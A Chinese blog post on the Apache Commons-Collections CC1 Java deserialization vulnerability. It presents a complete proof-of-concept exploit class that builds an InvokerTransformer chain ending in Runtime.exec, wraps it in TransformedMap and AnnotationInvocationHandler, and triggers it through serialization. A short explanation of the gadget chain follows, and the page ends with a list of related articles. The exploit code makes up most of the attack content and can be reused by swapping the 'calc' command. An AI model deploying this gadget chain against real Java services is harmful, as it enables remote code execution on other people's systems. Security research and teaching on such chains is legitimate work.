Commons-Collections(CC1) 反序列化漏洞

最新推荐文章于 2024-09-12 13:33:30 发布
最新推荐文章于 2024-09-12 13:33:30 发布
阅读量544 收藏 10
点赞数 22
文章标签: c语言 学习 网络安全 安全 网络攻击模型 安全架构 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50296568/article/details/140956880
版权

Commons-Collections (CC1)反序列化漏洞

文章目录

Commons-Collections介绍

Commons-Collections是一个开源的Java集合框架,它提供了一组可重用的集合接口、实现和工具类,以帮助开发人员更方便地操作和处理数据集合。

Commons-Collections提供了一些常见集合的实现,包括List、Set、Map等。这些实现类提供了丰富的功能和方法,能够满足不同的使用需求。另外,Commons-Collections还提供了一些特殊的集合类,如BidiMap(双向映射)、MultiMap(多值映射)等,可以更方便地处理一些复杂的数据结构。

除了集合实现,Commons-Collections还提供了一些工具类,用于操作和处理集合数据。这些工具类包括CollectionUtils、MapUtils、ListUtils等,提供了一些常用的集合操作方法,如查找、过滤、排序等,能够帮助开发人员更快速地完成集合操作。

Commons-Collections(cc1)反序列化漏洞PayLoad

package com.aqn.core;
​
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
​
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
​
public class POC {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
       //Runtime r = Runtime.getRuntime();
  /*      Class c = Runtime.class;
        Method getRuntimeMethod = c.getMethod("getRuntime", null);
        Runtime r = (Runtime) getRuntimeMethod.invoke(null, null);
        Method execMethod = c.getMethod("exec", String.class);
        execMethod.invoke(r,"calc");*/
   /*     Method getRuntimeMethod = (Method)new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}).transform(Runtime.class);
​
        Runtime r = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}).transform(getRuntimeMethod);
​
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(r);
*/
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
​
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        //chainedTransformer.transform(Runtime.class);
​
​
        //InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value","bbb");
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);
/*        for(Map.Entry entry:transformedMap.entrySet()){
 //          entry.setValue(Runtime.class);
        }*/
        //AnnotationInvocationHandler
      /*  Reader*/
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationdhdlConstructor.setAccessible(true);
        Object o = annotationInvocationdhdlConstructor.newInstance(Target.class,transformedMap);
​
        serialize(o);
        unserialize("ser.bin");
​
    }
    public static void serialize(Object obj) throws IOException, IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

原理解析

invokeTransformer的任意方法反射调用

public Object transform(Object input) {
 if (input == null) {
     return null;
 }
 try {
     Class cls = input.getClass();
     Method method = cls.getMethod(iMethodName, iParamTypes);    
     return method.invoke(input, iArgs); 
...
以及
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
 super();
 iMethodName = methodName;
 iParamTypes = paramTypes;
 iArgs = args;
}

以上部分是输入的 iMethodName , iParamTypes, iArgs 都是我们可以控制的参数。通过控制InvokerTransformer.transform()函数可以调用任何方法。

InvokerTransformer Transformer=new InvokerTransformer.transform(方法名,参数类型,调用方法的参数值)

调用Transform方法的checkSetValue方法

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}
...
protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer; 
    }
protected Object checkSetValue(Object value) { 
    return valueTransformer.transform(value);

}

通过decorate()方法实例化TransformedMap类,通过TransformedMap.decorate()方法使用上面的InvokerTransformer.transform()来调用任意方法。

AbstractInputCheckedMapDecorator的MapEntry.setValue()调用checkSetValue()方法

通过对AbstractInputCheckedMapDecorator类的遍历触发MapEntry.setValue()方法,使其调用checkSetValue()执行任意方法。

查找readObject()

AnnotationInvocationHandler类里面有readObject(),定位到memberValue可以控制,那么可以使用memberValue反射调用AbstractInputCheckedMapDecorator类。

B1ackMa9ic
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【java】Java的commons-collections反序列化漏洞
九师兄
07-19 71
Apache Commons Collections是Apache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。影响组件版本:
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3697
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
原来不只是fastjson,这个你每天都在用的类库也被爆过反序列化漏洞
勇往直前的专栏
07-13 305
在《fastjson到底做错了什么?为什么会被频繁爆出漏洞?》文章中,我从技术角度分析过为什么fastjson会被频繁爆出一些安全漏洞,然后有人在评论区发表"说到底就是fastjson烂…"等言论,一般遇到这种评论我都是不想理的。 但是事后想想,这个事情还是要单独说一下,因为这种想法很危险。 一旦这位读者有一天当上了领导,那么如果他负责的项目发生了漏洞,他还是站出来说"都怪XXX代码写的烂…",这其实是非常可怕的。 工作久了的话,就会慢慢有种感觉:代码都是人写的,是人写的代码就可能存在漏洞,这个是永远
Java的commons-collections反序列化漏洞
午夜安全
04-29 2873
Java的commons-collections反序列化漏洞 开始正文之前,我们的口号是:代码很有趣,安全很重要。 1.漏洞描述 在Java开发中,我们经常会使用到commons-collections这个jar包,当它的版本小于或等于3.2.1时,存在反序列化和远程代码执行的漏洞。 2.漏洞详情 TransformedMap这个类的decorate函数可以将一个普通的Map转换为一个T...
commons-collections反序列化漏洞分析——远程代码执行
qq_45766062的博客
08-17 857
这里先说说java里面的命令执行。其实java的命令执行和PHP类似,PHP一般通过eval和system来执行系统命令。java则是通过来执行系统命令。
Javaweb安全——反序列化漏洞-commons-collections4利用链(CC2和CC4)
weixin_43610673的博客
07-06 2388
在2015年底commons-collections反序列化利用链被提出时,Apache Commons Collections有以下两个分支版本:对旧CC链的影响主要体现在 这个方法被修改了在commons-collections4中对应的方法为。3和4的groupId和artifactId都不一样所以可以在同一项目中共存方便调试。 还是做的一个LazyMap构造函数包装,基本就是改了个名字,那将之前的链子decorate换成lazyMap就行,导入的包名变。以CC6为例: CC1、CC3、CC6修改之后
java--commoncollections1 反序列化漏洞利用学习
zyer
05-09 541
先附上代码 :jdk7u80环境 import org.apache.commons.collections.map.TransformedMap; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransf
JAVA 反序列化之 Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 1996
Apache Commons Collections 反序列化漏洞研究
common-collections中Java反序列化漏洞导致的RCE原理分析
weixin_33797791的博客
03-08 459
隐形人真忙 · 2015/11/11 22:400x00 背景这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org/content/23849给出了具体的原理。作为一个业余的安全研究人员,除了会利用之外,还可以探究一下背后的原理。0x01 原理Java反序列化导致的漏洞原理上和PHP反序列一样,也是由于用户的输入...
commons-collections4-4.1
11-01
在这个"commons-collections4-4.1"版本中,主要关注的是修复一个重要的安全问题——Java反序列化漏洞。 Java反序列化漏洞通常发生在处理从网络接收或从持久存储中读取的序列化对象时。当恶意构造的序列化数据被反...
commons-collections-3.2.2-
11-01
这个"commons-collections-3.2.2-"版本是该库的一个特定发行版,主要用于解决WebLogic服务器上的反序列化漏洞问题。 在Java编程中,集合框架是处理对象数组的重要组成部分。Apache Commons Collections扩展了Java...
C语言-第九章:文件读写
2303_78095330的博客
09-07 685
我们在C语言中操作的文件和平时使用来记录文字的文件是同一个东西,平时在电脑上打开文件时,我们可能需要点进各种文件夹中,这个过程就是根据文件的路径找到文件,文件路径在windows的窗口中也有显示:它的路径就是"此电脑 \ Windows-SSD(C:) \ Windows \ addins",这种从最外面到最里面的路径叫做绝对路径。
Ascend C算子开发(中级)—— 编写Sinh算子
Byyyi耀的博客
09-08 1106
Ascend C算子开发(中级)—— 编写Sinh算子
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 764
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
Redis 入门 - 五大基础类型及其指令学习
IT规划师
09-11 405
学习Redis基础类型:字符串、集合、有序集合、列表、哈希,每种类型有各自的特点和常用指令。掌握这些基础是熟练使用Redis的关键。更多指令需自行尝试。
计算几何学习
网安小白
09-12 299
学习计算几何过程中对经典算法的记录
学习笔记】SSL密码套件之哈希
最新发布
Taki_UP的博客
09-12 698
本篇介绍了TLS/SSL密码套件中常用的哈希算法,包括Poly1305、SHA384、SHA256、SHA、MD5
sheng的学习笔记-AI-规则学习(rule learning)
coldstarry的专栏
09-09 1052
机器学习中的“规则”(rule)通常是指语义明确、能描述数据分布所隐含的客观规律或领域概念、可写成“若……,则……”形式的逻辑规则。​“规则学习”(rule learning)是从训练数据中学习出一组能用于对未见示例进行判别的规则。一条规则形如:在数理逻辑中“文字”专指原子公式(atom)及其否定。与神经网络、支持向量机这样的“黑箱模型”相比,规则学习具有更好的可解释性,能使用户更直观地对判别过程有所了解。另一方面,数理逻辑具有极强的表达能力,绝大多数人类知识都能通过数理逻辑进行简洁的刻画和表达。
常见的Java反序列化漏洞
05-20
Java反序列化漏洞是指攻击者通过修改序列化对象中的数据,使得反序列化操作返回恶意对象,从而导致应用程序受到攻击的漏洞。常见的Java反序列化漏洞包括: 1. JDK 6u45及以下版本的RMI反序列化漏洞:攻击者可以通过构造恶意的序列化数据,导致RMI服务端在反序列化时执行任意代码。 2. Commons-Collections反序列化漏洞:攻击者可以通过构造恶意的序列化数据,导致反序列化时执行任意代码。 3. Jackson反序列化漏洞:攻击者可以通过构造恶意的JSON数据,导致反序列化时执行任意代码。 4. XStream反序列化漏洞:攻击者可以通过构造恶意的XML数据,导致反序列化时执行任意代码。 5. Fastjson反序列化漏洞:攻击者可以通过构造恶意的JSON数据,导致反序列化时执行任意代码。 为避免反序列化漏洞的发生,建议在反序列化操作时验证数据的完整性和合法性,同时使用安全的序列化和反序列化框架。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值